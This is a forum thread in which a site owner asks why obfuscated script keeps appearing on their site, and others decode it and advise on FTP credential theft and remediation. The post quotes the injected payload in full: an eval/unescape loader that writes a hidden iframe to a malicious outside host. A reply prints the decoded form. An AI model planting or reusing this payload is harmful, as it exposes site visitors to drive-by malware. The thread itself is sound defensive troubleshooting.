Hello guys.
I am totally unaware what is happening to my site.. My site automatically generate strange script which cause error in my site.
the script like.
<script>eval(unescape('%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%77%6F%74%62%6F%70%2E%63%6F%6D%2F%3F%31%31%38%32%31%33%31%32%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%3E%3C%2F%69%66%72%61%6D%65%3E%27%29'));</script><!-- uy7gdr5332rkmn -->
when i upload new copy . it works fine . but after few hours it again start generating the script . which mentioned Above.
please help me out in this regard.
Any suggestion would be highly adorable .
thanks
Regards
SamSalman
My Site Automatically Generate strange Scripts
- 81
- 425
- 7/1/2010
- Sweden
Seems like someone (or something) is messing with your site, if you translate the code you will get this:
document.write('<iframe src="http://awotbop.com/?11821312" width=1 height=1></iframe>')
And according to norton awotbop.com is not a nice site.
I found a good page for your information:
http://www.ethanzuckerman.com/blog/2007/03/21/hacked-websites-trojan-horses-russianpanamanian-blackhat-hackers-just-another-day-at-the-berkman-center/
The question is then how do they get the code on to your page? Is there a security issue within nopCommerce (I really do hope not) or do any of your files have write permissions on your server?
Good luck.
BR
Joakim
document.write('<iframe src="http://awotbop.com/?11821312" width=1 height=1></iframe>')
And according to norton awotbop.com is not a nice site.
I found a good page for your information:
http://www.ethanzuckerman.com/blog/2007/03/21/hacked-websites-trojan-horses-russianpanamanian-blackhat-hackers-just-another-day-at-the-berkman-center/
The question is then how do they get the code on to your page? Is there a security issue within nopCommerce (I really do hope not) or do any of your files have write permissions on your server?
Good luck.
BR
Joakim
- 45
- 309
- 8/13/2010
- United Kingdom
Are these changes being made to aspx pages? Or to db content.
iF the changes are to the scripts make sure its not getting in via ftp. Most of these i have seen have been bots breaking in through ftp.
It appears they get the FTP info from malware on a machine that is used to update the website. Do a good full virus sweep on the machine, and also, change the passwords on the FTP account once you've done that. If possible get the FTP locked down to only allow access via IP addresses.
Much of this malware getting onto machines via out of date PDF and Flash software on your browser, so make sure that is all updated.
iF the changes are to the scripts make sure its not getting in via ftp. Most of these i have seen have been bots breaking in through ftp.
It appears they get the FTP info from malware on a machine that is used to update the website. Do a good full virus sweep on the machine, and also, change the passwords on the FTP account once you've done that. If possible get the FTP locked down to only allow access via IP addresses.
Much of this malware getting onto machines via out of date PDF and Flash software on your browser, so make sure that is all updated.